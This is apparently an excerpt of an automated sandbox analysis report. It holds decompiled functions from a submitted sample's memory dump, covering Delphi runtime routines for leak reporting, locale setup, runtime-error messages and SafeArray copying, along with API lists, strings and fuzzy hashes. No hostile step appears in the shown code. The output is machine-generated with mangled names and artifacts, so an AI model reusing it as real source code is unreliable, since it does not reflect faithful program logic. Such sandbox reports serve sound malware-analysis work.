				while(_t180 != 0x329b708) {
					_t79 = E03262048(_t180);
					_t131 = _t79;
					__eflags = _t131;
					if(_t131 == 0) {
						L12:
						_t180 =  *((intOrPtr*)(_t180 + 4));
						continue;
					} else {
						goto L5;
					}
					do {
						L5:
						_t194 =  *(_t131 - 4);
						__eflags = _t194 & 0x00000001;
						if((_t194 & 0x00000001) == 0) {
							__eflags = _t194 & 0x00000004;
							if(__eflags == 0) {
								__eflags = _v112652 - 0x1000;
								if(_v112652 < 0x1000) {
									_v112664 = (_t194 & 0xfffffff0) - 4;
									_t126 = E0326238C(_t131);
									__eflags = _t126;
									if(_t126 == 0) {
										_v112645 = 0;
										 *((intOrPtr*)(_t198 + _v112652 * 4 - 0x1f828)) = _v112664;
										_t18 =  &_v112652;
										 *_t18 = _v112652 + 1;
										__eflags =  *_t18;
									}
								}
							} else {
								E032623E4(_t131, __eflags, _t198);
							}
						}
						_t79 = E03262024(_t131);
						_t131 = _t79;
						__eflags = _t131;
					} while (_t131 != 0);
					goto L12;
				}
				_t132 =  *0x329d7b0; // 0x7fde0000
				while(_t132 != 0x329d7ac && _v112652 < 0x1000) {
					_t79 = E0326238C(_t132 + 0x10);
					__eflags = _t79;
					if(_t79 == 0) {
						_v112645 = 0;
						_t22 = _t132 + 0xc; // 0xd0004
						_t79 = _v112652;
						 *((intOrPtr*)(_t198 + _t79 * 4 - 0x1f828)) = ( *_t22 & 0xfffffff0) - 0xfffffffffffffff4;
						_t27 =  &_v112652;
						 *_t27 = _v112652 + 1;
						__eflags =  *_t27;
					}
					_t29 = _t132 + 4; // 0x7f2d0000
					_t132 =  *_t29;
				}
				if(_v112645 != 0) {
					L49:
					return _t79;
				}
				_v112653 = 0;
				_v112668 = 0;
				_t134 = E032621E0(0x28,  &_v161836);
				_v112660 = 0x37;
				_v112680 = 0x3289042;
				_v112684 =  &_v110600;
				do {
					_v112672 = ( *_v112680 & 0x0000ffff) - 4;
					_v112654 = 0;
					_t182 = 0xff;
					_t188 = _v112684;
					while(_t134 <=  &_v131117) {
						if( *_t188 > 0) {
							if(_v112653 == 0) {
								_t134 = E032621E0(0x27, _t134);
								_v112653 = 1;
							}
							if(_v112654 != 0) {
								 *_t134 = 0x2c;
								_t139 = _t134 + 1;
								 *_t139 = 0x20;
								_t140 = _t139 + 1;
								__eflags = _t139 + 1;
							} else {
								 *_t134 = 0xd;
								 *((char*)(_t134 + 1)) = 0xa;
								_t147 = E032620C4(_v112668 + 1, _t134 + 2);
								 *_t147 = 0x20;
								_t148 = _t147 + 1;
								 *_t148 = 0x2d;
								 *((char*)(_t148 + 1)) = 0x20;
								_t140 = E032621E0(8, E032620C4(_v112672, _t148 + 2));
								_v112654 = 1;
							}
							_t214 = _t182 - 1;
							if(_t214 < 0) {
								_t141 = E032621E0(7, _t140);
							} else {
								if(_t214 == 0) {
									_t141 = E032621E0(6, _t140);
								} else {
									E0326363C( *((intOrPtr*)(_t188 - 4)),  &_v162092);
									_t141 = E032621E0(_v162092 & 0x000000ff, _t140);
								}
							}
							 *_t141 = 0x20;
							_t142 = _t141 + 1;
							 *_t142 = 0x78;
							 *((char*)(_t142 + 1)) = 0x20;
							_t134 = E032620C4( *_t188, _t142 + 2);
						}
						_t182 = _t182 - 1;
						_t188 = _t188 - 8;
						if(_t182 != 0xffffffff) {
							continue;
						} else {
							goto L38;
						}
					}
					L38:
					_v112668 = _v112672;
					_v112684 = _v112684 + 0x800;
					_v112680 =  &(_v112680[0x10]);
					_t60 =  &_v112660;
					 *_t60 = _v112660 - 1;
				} while ( *_t60 != 0);
				if(_v112652 <= 0) {
					L48:
					E032621E0(3, _t134);
					_t79 = MessageBoxA(0,  &_v161836, "Unexpected Memory Leak", 0x2010);
					goto L49;
				}
				if(_v112653 != 0) {
					 *_t134 = 0xd;
					_t136 = _t134 + 1;
					 *_t136 = 0xa;
					_t137 = _t136 + 1;
					 *_t137 = 0xd;
					_t138 = _t137 + 1;
					 *_t138 = 0xa;
					_t134 = _t138 + 1;
				}
				_t134 = E032621E0(0x3c, _t134);
				_t184 = _v112652 - 1;
				if(_t184 >= 0) {
					_t185 = _t184 + 1;
					_v112676 = 0;
					_t189 =  &_v129068;
					L44:
					L44:
					if(_v112676 != 0) {
						 *_t134 = 0x2c;
						_t135 = _t134 + 1;
						 *_t135 = 0x20;
						_t134 = _t135 + 1;
					}
					_t134 = E032620C4( *_t189, _t134);
					if(_t134 >  &_v131117) {
						goto L48;
					}
					_v112676 =  &(_v112676->i);
					_t189 = _t189 + 4;
					_t185 = _t185 - 1;
					if(_t185 != 0) {
						goto L44;
					}
				}
				L2:
				_t200 = _t200 + 0xfffff004;
				_push(_t73);
				_t73 = _t73 - 1;
				if(_t73 != 0) {
					goto L2;
				} else {
					E03263098( &_v112644, 0x1b800);
					E03263098( &_v129068, 0x4000);
					_t79 = 0;
					_v112652 = 0;
					_v112645 = 1;
					_t180 =  *0x329b70c; // 0x91c0000
					goto L13;
				}
			}

0x03262531
0x03262533
0x03262534
0x03262534
0x00000000
0x0326260f
0x0326258f
0x03262594
0x03262596
0x03262598
0x0326260c
0x0326260c
0x00000000
0x00000000
0x00000000
0x00000000
0x0326259a
0x0326259a
0x0326259f
0x032625a1
0x032625a7
0x032625a9
0x032625af
0x032625bc
0x032625c6
0x032625ce
0x032625d6
0x032625db
0x032625dd
0x032625df
0x032625f2
0x032625f9
0x032625f9
0x032625f9
0x032625f9
0x032625dd
0x032625b1
0x032625b4
0x032625b9
0x032625af
0x03262601
0x03262606
0x03262608
0x03262608
0x00000000
0x0326259a
0x0326261b
0x0326265a
0x03262628
0x0326262d
0x0326262f
0x03262631
0x03262638
0x03262644
0x0326264a
0x03262651
0x03262651
0x03262651
0x03262651
0x03262657
0x03262657
0x03262657
0x03262675
0x032628d3
0x032628d9
0x032628d9
0x0326267b
0x03262684
0x0326269f
0x032626a1
0x032626ab
0x032626bb
0x032626c1
0x032626cd
0x032626d3
0x032626da
0x032626e5
0x032626e7
0x032626f8
0x03262705
0x03262718
0x0326271a
0x0326271a
0x03262728
0x03262779
0x0326277c
0x0326277d
0x03262780
0x03262780
0x0326272a
0x0326272a
0x0326272e
0x03262740
0x03262742
0x03262745
0x03262746
0x0326274a
0x0326276e
0x03262770
0x03262770
0x03262783
0x03262786
0x0326279d
0x03262788
0x03262788
0x032627b2
0x0326278a
0x032627bf
0x032627d8
0x032627d8
0x03262788
0x032627da
0x032627dd
0x032627de
0x032627e2
0x032627ef
0x032627ef
0x032627f1
0x032627f2
0x032627f8
0x00000000
0x00000000
0x00000000
0x00000000
0x032627f8
0x032627fe
0x03262804
0x0326280a
0x03262814
0x0326281b
0x0326281b
0x0326281b
0x0326282e
0x032628aa
0x032628b6
0x032628ce
0x00000000
0x032628ce
0x03262837
0x03262839
0x0326283c
0x0326283d
0x03262840
0x03262841
0x03262844
0x03262845
0x03262848
0x03262848
0x0326285a
0x03262862
0x03262865
0x03262867
0x03262868
0x03262872
0x00000000
0x03262878
0x0326287f
0x03262881
0x03262884
0x03262885
0x03262888
0x03262888
0x03262892
0x0326289c
0x00000000
0x00000000
0x0326289e
0x032628a4
0x032628a7
0x032628a8
0x00000000
0x00000000
0x032628a8
0x03262539
0x03262539
0x0326253f
0x03262540
0x03262541
0x00000000
0x03262543
0x0326255c
0x0326256e
0x03262573
0x03262575
0x0326257b
0x03262582
0x00000000
0x03262582

Strings

The sizes of unexpected leaked medium and large blocks are: , xrefs: 03262849
The unexpected small block leaks are:, xrefs: 03262707
bytes: , xrefs: 0326275D
Unexpected Memory Leak, xrefs: 032628C0
, xrefs: 03262814
7, xrefs: 032626A1
An unexpected memory leak has occurred. , xrefs: 03262690

Memory Dump Source

Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true

Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd

Similarity

API ID:
String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
API String ID: 0-2723507874
Opcode ID: 779f13660341f44dc1d31402ba567402e67fcbedb2c88dbf375a7a6a80379cd2
Instruction ID: 57874693f2b568bae20a0bb6ee9d6f49abb8bf3bb8e48238bead75ce6032ef31
Opcode Fuzzy Hash: 779f13660341f44dc1d31402ba567402e67fcbedb2c88dbf375a7a6a80379cd2
Instruction Fuzzy Hash: 6A71C534A24398CFDB21DA2CCC84BD8BAF9EF09700F1459E5D549DB282DBB58AC5CB51

Uniqueness

Uniqueness Score: -1.00%

Function 032917D4 Relevance: 12.9, Strings: 10, Instructions: 365COMMON

Download Yara Rule

Strings

I, xrefs: 032918A1
F, xrefs: 03291B4E
-, xrefs: 03291872
0, xrefs: 032918DB
A, xrefs: 03291BB3
N, xrefs: 032918AA
N, xrefs: 03291BD2
9, xrefs: 032918E4
N, xrefs: 03291B37
+, xrefs: 03291867

Memory Dump Source

Source File: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true

Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd

Similarity

API ID:
String ID: +$-$0$9$A$F$I$N$N$N
API String ID: 0-1648577461
Opcode ID: 2e8387257570eda45cc7b934ad265545eca86ec623c7b602e9144ae6f6a7cda6
Instruction ID: 5ab91b341e6404df1f2e9b8a22b66250f9f2a12ad75c87571d04c49cb0c8a227
Opcode Fuzzy Hash: 2e8387257570eda45cc7b934ad265545eca86ec623c7b602e9144ae6f6a7cda6
Instruction Fuzzy Hash: C0E1A175E2424B9BFF10CFAAD5842EDFBB5BF08300F2481ABD815A7250D375AA90CB55

Uniqueness

Uniqueness Score: -1.00%

Function 03291CB8 Relevance: 12.9, Strings: 10, Instructions: 363COMMON

Download Yara Rule

Strings

+, xrefs: 03291D48
N, xrefs: 03292018
N, xrefs: 032920B3
F, xrefs: 0329202F
-, xrefs: 03291D53
N, xrefs: 03291D8B
0, xrefs: 03291DBC
9, xrefs: 03291DC5
I, xrefs: 03291D82
A, xrefs: 03292094

Memory Dump Source

Source File: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true

Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd

Similarity

API ID:
String ID: +$-$0$9$A$F$I$N$N$N
API String ID: 0-1648577461
Opcode ID: f88074ef882d433715eecd647d47c0ec08558ead3a85b5924cd63f73f9c18cbf
Instruction ID: 0d5fd2d881543e62f35df282a6a348f0f284aa4e84c4393e6c77f0e9b33da748
Opcode Fuzzy Hash: f88074ef882d433715eecd647d47c0ec08558ead3a85b5924cd63f73f9c18cbf
Instruction Fuzzy Hash: A3E1B174D2424BDFEF20CFA9C5846EDFBB1AF08300F24819BD855A7251D3716A91CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0326BDA4 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201
threadCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E0326BDA4(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				void* _t104;
				void* _t111;
				void* _t133;
				intOrPtr _t183;
				intOrPtr _t193;
				intOrPtr _t194;

				_t191 = __esi;
				_t190 = __edi;
				_t193 = _t194;
				_t133 = 8;
				do {
					_push(0);
					_push(0);
					_t133 = _t133 - 1;
				} while (_t133 != 0);
				_push(__ebx);
				_push(_t193);
				_push(0x326c06f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t194;
				E0326BCE0();
				E0326A85C(__ebx, __edi, __esi);
				_t196 =  *0x329d8d8;
				if( *0x329d8d8 != 0) {
					E0326AA34(__esi, _t196);
				}
				_t132 = GetThreadLocale();
				E0326A7A8(_t43, 0, 0x14,  &_v20);
				E032644F4(0x329d80c, _v20);
				E0326A7A8(_t43, 0x326c084, 0x1b,  &_v24);
				 *0x329d810 = E03267AEC(0x326c084, 0, _t196);
				E0326A7A8(_t132, 0x326c084, 0x1c,  &_v28);
				 *0x329d811 = E03267AEC(0x326c084, 0, _t196);
				 *0x329d812 = E0326A7F4(_t132, 0x2c, 0xf);
				 *0x329d813 = E0326A7F4(_t132, 0x2e, 0xe);
				E0326A7A8(_t132, 0x326c084, 0x19,  &_v32);
				 *0x329d814 = E03267AEC(0x326c084, 0, _t196);
				 *0x329d815 = E0326A7F4(_t132, 0x2f, 0x1d);
				E0326A7A8(_t132, "m/d/yy", 0x1f,  &_v40);
				E0326AAE4(_v40, _t132,  &_v36, _t190, _t191, _t196);
				E032644F4(0x329d818, _v36);
				E0326A7A8(_t132, "mmmm d, yyyy", 0x20,  &_v48);
				E0326AAE4(_v48, _t132,  &_v44, _t190, _t191, _t196);
				E032644F4(0x329d81c, _v44);
				 *0x329d820 = E0326A7F4(_t132, 0x3a, 0x1e);
				E0326A7A8(_t132, 0x326c0b8, 0x28,  &_v52);
				E032644F4(0x329d824, _v52);
				E0326A7A8(_t132, 0x326c0c4, 0x29,  &_v56);
				E032644F4(0x329d828, _v56);
				E032644A0( &_v12);
				E032644A0( &_v16);
				E0326A7A8(_t132, 0x326c084, 0x25,  &_v60);
				_t104 = E03267AEC(0x326c084, 0, _t196);
				_t197 = _t104;
				if(_t104 != 0) {
					E03264538( &_v8, 0x326c0dc);
				} else {
					E03264538( &_v8, 0x326c0d0);
				}
				E0326A7A8(_t132, 0x326c084, 0x23,  &_v64);
				_t111 = E03267AEC(0x326c084, 0, _t197);
				_t198 = _t111;
				if(_t111 == 0) {
					E0326A7A8(_t132, 0x326c084, 0x1005,  &_v68);
					if(E03267AEC(0x326c084, 0, _t198) != 0) {
						E03264538( &_v12, 0x326c0f8);
					} else {
						E03264538( &_v16, 0x326c0e8);
					}
				}
				_push(_v12);
				_push(_v8);
				_push(":mm");
				_push(_v16);
				E03264824();
				_push(_v12);
				_push(_v8);
				_push(":mm:ss");
				_push(_v16);
				E03264824();
				 *0x329d8da = E0326A7F4(_t132, 0x2c, 0xc);
				_pop(_t183);
				 *[fs:eax] = _t183;
				_push(E0326C076);
				return E032644C4( &_v68, 0x10);
			}

0x0326bda4
0x0326bda4
0x0326bda5
0x0326bda7
0x0326bdac
0x0326bdac
0x0326bdae
0x0326bdb0
0x0326bdb0
0x0326bdb3
0x0326bdb6
0x0326bdb7
0x0326bdbc
0x0326bdbf
0x0326bdc2
0x0326bdc7
0x0326bdcc
0x0326bdd3
0x0326bdd5
0x0326bdd5
0x0326bddf
0x0326bdee
0x0326bdfb
0x0326be10
0x0326be1f
0x0326be34
0x0326be43
0x0326be56
0x0326be69
0x0326be7e
0x0326be8d
0x0326bea0
0x0326beb5
0x0326bec0
0x0326becd
0x0326bee2
0x0326beed
0x0326befa
0x0326bf0d
0x0326bf22
0x0326bf2f
0x0326bf44
0x0326bf51
0x0326bf59
0x0326bf61
0x0326bf76
0x0326bf80
0x0326bf85
0x0326bf87
0x0326bfa0
0x0326bf89
0x0326bf91
0x0326bf91
0x0326bfb5
0x0326bfbf
0x0326bfc4
0x0326bfc6
0x0326bfd8
0x0326bfe9
0x0326c002
0x0326bfeb
0x0326bff3
0x0326bff3
0x0326bfe9
0x0326c007
0x0326c00a
0x0326c00d
0x0326c012
0x0326c01f
0x0326c024
0x0326c027
0x0326c02a
0x0326c02f
0x0326c03c
0x0326c04f
0x0326c056
0x0326c059
0x0326c05c
0x0326c06e

APIs

GetThreadLocale.KERNEL32(00000000,0326C06F,?,?,00000000,00000000), ref: 0326BDDA

Part of subcall function 0326A7A8: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0326A7C6

Strings

:mm:ss, xrefs: 0326C02A
:mm, xrefs: 0326C00D
m/d/yy, xrefs: 0326BEA9
AMPM, xrefs: 0326BFEE
AMPM , xrefs: 0326BFFD
mmmm d, yyyy, xrefs: 0326BED6

Memory Dump Source

Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true

Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd

Similarity

API ID: Locale$InfoThread
String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
API String ID: 4232894706-2493093252
Opcode ID: a8c1d8e8eccd8d158ebf2d900957ff9d167bccfd8815a121fa376409ad9bbf77
Instruction ID: 229610e88246eddc39ae550f3d10c8d5213abc596d56a5b35f3616b168f57853
Opcode Fuzzy Hash: a8c1d8e8eccd8d158ebf2d900957ff9d167bccfd8815a121fa376409ad9bbf77
Instruction Fuzzy Hash: D7616378730388ABDB01FBA8EC5069E77B9AF88200F509475A141EF346CA79DDC69750

Uniqueness

Uniqueness Score: -1.00%

Function 03264320 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38
filewindowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E03264320(void* __ecx) {
				long _v4;
				int _t3;

				if( *0x329b04c == 0) {
					if( *0x3289030 == 0) {
						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
					}
					return _t3;
				} else {
					if( *0x329b220 == 0xd7b2 &&  *0x329b228 > 0) {
						 *0x329b238();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
					return WriteFile(GetStdHandle(0xfffffff5), E032643A8, 2,  &_v4, 0);
				}
			}

0x03264328
0x03264388
0x03264398
0x03264398
0x0326439e
0x0326432a
0x03264333
0x03264343
0x03264343
0x0326435f
0x03264380
0x03264380

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,032643E7,?,?,0329D7C8,?,?,032897A8,03266575,03288305), ref: 03264359
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,032643E7,?,?,0329D7C8,?,?,032897A8,03266575,03288305), ref: 0326435F
GetStdHandle.KERNEL32(000000F5,032643A8,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,032643E7,?,?,0329D7C8), ref: 03264374
WriteFile.KERNEL32(00000000,000000F5,032643A8,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,032643E7,?,?), ref: 0326437A
MessageBoxA.USER32 ref: 03264398

Strings

Runtime error at 00000000, xrefs: 03264352, 03264391
Error, xrefs: 0326438C

Memory Dump Source

Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true

Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd

Similarity

API ID: FileHandleWrite$Message
String ID: Error$Runtime error at 00000000
API String ID: 1570097196-2970929446
Opcode ID: 97fc03acaee9f1586b4c93cc61a0d4f8a5c361716bfcc2a4c0dbf716d6b97b9f
Instruction ID: 3b67088cafa5dc8b5cec22a54a213b5caffd282e09b37627085d2dee1ac6d75d
Opcode Fuzzy Hash: 97fc03acaee9f1586b4c93cc61a0d4f8a5c361716bfcc2a4c0dbf716d6b97b9f
Instruction Fuzzy Hash: 75F090A4EB5344B8FA10F7A1BC4AF6D261C9F80F11FA88646B260DD0C597E060D09321

Uniqueness

Uniqueness Score: -1.00%

Function 0326AEA8 Relevance: 10.6, APIs: 7, Instructions: 56
filewindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0326AEA8(void* __edx, void* __edi, void* __fp0) {
				void _v1024;
				char _v1088;
				long _v1092;
				void* _t12;
				char* _t14;
				intOrPtr _t16;
				intOrPtr _t18;
				intOrPtr _t24;
				long _t32;

				E0326AD20(_t12,  &_v1024, __edx, __fp0, 0x400);
				_t14 =  *0x329a900; // 0x329b04c
				if( *_t14 == 0) {
					_t16 =  *0x329a7d4; // 0x326687c
					_t9 = _t16 + 4; // 0xffea
					_t18 =  *0x329d7f8; // 0x3260000
					LoadStringA(E03265874(_t18),  *_t9,  &_v1088, 0x40);
					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
				}
				_t24 =  *0x329a7fc; // 0x329b21c
				E03262D4C(E03262FC4(_t24));
				CharToOemA( &_v1024,  &_v1024);
				_t32 = E03268048( &_v1024, __edi);
				WriteFile(GetStdHandle(0xfffffff4),  &_v1024, _t32,  &_v1092, 0);
				return WriteFile(GetStdHandle(0xfffffff4), 0x326af6c, 2,  &_v1092, 0);
			}

0x0326aeb7
0x0326aebc
0x0326aec4
0x0326af2b
0x0326af30
0x0326af34
0x0326af3f
0x00000000
0x0326af55
0x0326aec6
0x0326aed0
0x0326aedf
0x0326aeef
0x0326af02
0x00000000

APIs

Part of subcall function 0326AD20: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0326AD3D
Part of subcall function 0326AD20: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0326AD61
Part of subcall function 0326AD20: GetModuleFileNameA.KERNEL32(03260000,?,00000105), ref: 0326AD7C
Part of subcall function 0326AD20: LoadStringA.USER32 ref: 0326AE12

CharToOemA.USER32 ref: 0326AEDF
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0326AEFC
WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0326AF02
GetStdHandle.KERNEL32(000000F4,0326AF6C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0326AF17
WriteFile.KERNEL32(00000000,000000F4,0326AF6C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0326AF1D
LoadStringA.USER32 ref: 0326AF3F
MessageBoxA.USER32 ref: 0326AF55

Memory Dump Source

Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true

Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd

Similarity

API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
String ID:
API String ID: 185507032-0
Opcode ID: 226a4653f65e92da9d295d4f29fdbd87fcdcb179e7480af3183a23fd902323fc
Instruction ID: c604ff91590b887be7b4e239cfbb71df4096399dec3e29c4de078644c36d8646
Opcode Fuzzy Hash: 226a4653f65e92da9d295d4f29fdbd87fcdcb179e7480af3183a23fd902323fc
Instruction Fuzzy Hash: 1F112AFA164304BAD601FBA4DC85F9F77ECAF44700F404926B354EA0E1DAB5E9C487A2

Uniqueness

Uniqueness Score: -1.00%

Function 0326E570 Relevance: 9.1, APIs: 6, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E0326E570(short* __eax, intOrPtr __ecx, signed short* __edx) {
				char _v260;
				char _v768;
				char _v772;
				short* _v776;
				intOrPtr _v780;
				char _v784;
				signed int _v788;
				signed short* _v792;
				char _v796;
				char _v800;
				intOrPtr* _v804;
				void* __ebp;
				signed char _t47;
				signed int _t54;
				void* _t62;
				intOrPtr* _t73;
				signed short* _t91;
				void* _t93;
				void* _t95;
				void* _t98;
				void* _t99;
				intOrPtr* _t108;
				void* _t112;
				intOrPtr _t113;
				char* _t114;
				void* _t115;

				_t100 = __ecx;
				_v780 = __ecx;
				_t91 = __edx;
				_v776 = __eax;
				if(( *(__edx + 1) & 0x00000020) == 0) {
					E0326E014(0x80070057);
				}
				_t47 =  *_t91 & 0x0000ffff;
				if((_t47 & 0x00000fff) != 0xc) {
					_push(_t91);
					_push(_v776);
					L0326CDD4();
					return E0326E014(_v776);
				} else {
					if((_t47 & 0x00000040) == 0) {
						_v792 = _t91[4];
					} else {
						_v792 =  *(_t91[4]);
					}
					_v788 =  *_v792 & 0x0000ffff;
					_t93 = _v788 - 1;
					if(_t93 < 0) {
						L9:
						_push( &_v772);
						_t54 = _v788;
						_push(_t54);
						_push(0xc);
						L0326D22C();
						_t113 = _t54;
						if(_t113 == 0) {
							E0326DD6C(_t100);
						}
						E0326E3C4(_v776);
						 *_v776 = 0x200c;
						 *((intOrPtr*)(_v776 + 8)) = _t113;
						_t95 = _v788 - 1;
						if(_t95 < 0) {
							L14:
							_t97 = _v788 - 1;
							if(E0326E4E4(_v788 - 1, _t115) != 0) {
								L0326D244();
								E0326E014(_v792);
								L0326D244();
								E0326E014( &_v260);
								_v780(_t113,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
							}
							_t62 = E0326E514(_t97, _t115);
						} else {
							_t98 = _t95 + 1;
							_t73 =  &_v768;
							_t108 =  &_v260;
							do {
								 *_t108 =  *_t73;
								_t108 = _t108 + 4;
								_t73 = _t73 + 8;
								_t98 = _t98 - 1;
							} while (_t98 != 0);
							do {
								goto L14;
							} while (_t62 != 0);
							return _t62;
						}
					} else {
						_t99 = _t93 + 1;
						_t112 = 0;
						_t114 =  &_v772;
						do {
							_v804 = _t114;
							_push(_v804 + 4);
							_t18 = _t112 + 1; // 0x1
							_push(_v792);
							L0326D234();
							E0326E014(_v792);
							_push( &_v784);
							_t21 = _t112 + 1; // 0x1
							_push(_v792);
							L0326D23C();
							E0326E014(_v792);
							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
							_t112 = _t112 + 1;
							_t114 = _t114 + 8;
							_t99 = _t99 - 1;
						} while (_t99 != 0);
						goto L9;
					}
				}
			}

0x0326e570
0x0326e57c
0x0326e582
0x0326e584
0x0326e58e
0x0326e595
0x0326e595
0x0326e59a
0x0326e5a8
0x0326e721
0x0326e728
0x0326e729
0x00000000
0x0326e5ae
0x0326e5b1
0x0326e5c3
0x0326e5b3
0x0326e5b8
0x0326e5b8
0x0326e5d2
0x0326e5de
0x0326e5e1
0x0326e64e
0x0326e654
0x0326e655
0x0326e65b
0x0326e65c
0x0326e65e
0x0326e663
0x0326e667
0x0326e669
0x0326e669
0x0326e674
0x0326e67f
0x0326e68a
0x0326e693
0x0326e696
0x0326e6b2
0x0326e6b9
0x0326e6c4
0x0326e6db
0x0326e6e0
0x0326e6f4
0x0326e6f9
0x0326e70c
0x0326e70c
0x0326e715
0x0326e698
0x0326e698
0x0326e699
0x0326e69f
0x0326e6a5
0x0326e6a7
0x0326e6a9
0x0326e6ac
0x0326e6af
0x0326e6af
0x0326e6b2
0x00000000
0x00000000
0x00000000
0x0326e6b2
0x0326e5e3
0x0326e5e3
0x0326e5e4
0x0326e5e6
0x0326e5ec
0x0326e5ee
0x0326e5fd
0x0326e5fe
0x0326e608
0x0326e609
0x0326e60e
0x0326e619
0x0326e61a
0x0326e624
0x0326e625
0x0326e62a
0x0326e645
0x0326e647
0x0326e648
0x0326e64b
0x0326e64b
0x00000000
0x0326e5ec
0x0326e5e1

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0326E609
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0326E625
SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0326E65E
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0326E6DB
SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0326E6F4
VariantCopy.OLEAUT32(?,00000000), ref: 0326E729

Memory Dump Source

Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true

Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd

Similarity

API ID: ArraySafe$BoundIndex$CopyCreateVariant
String ID:
API String ID: 351091851-0
Opcode ID: 2c879650c84341011691a20226c27d6524aee0beb2559d3f6bcac5042424fc10
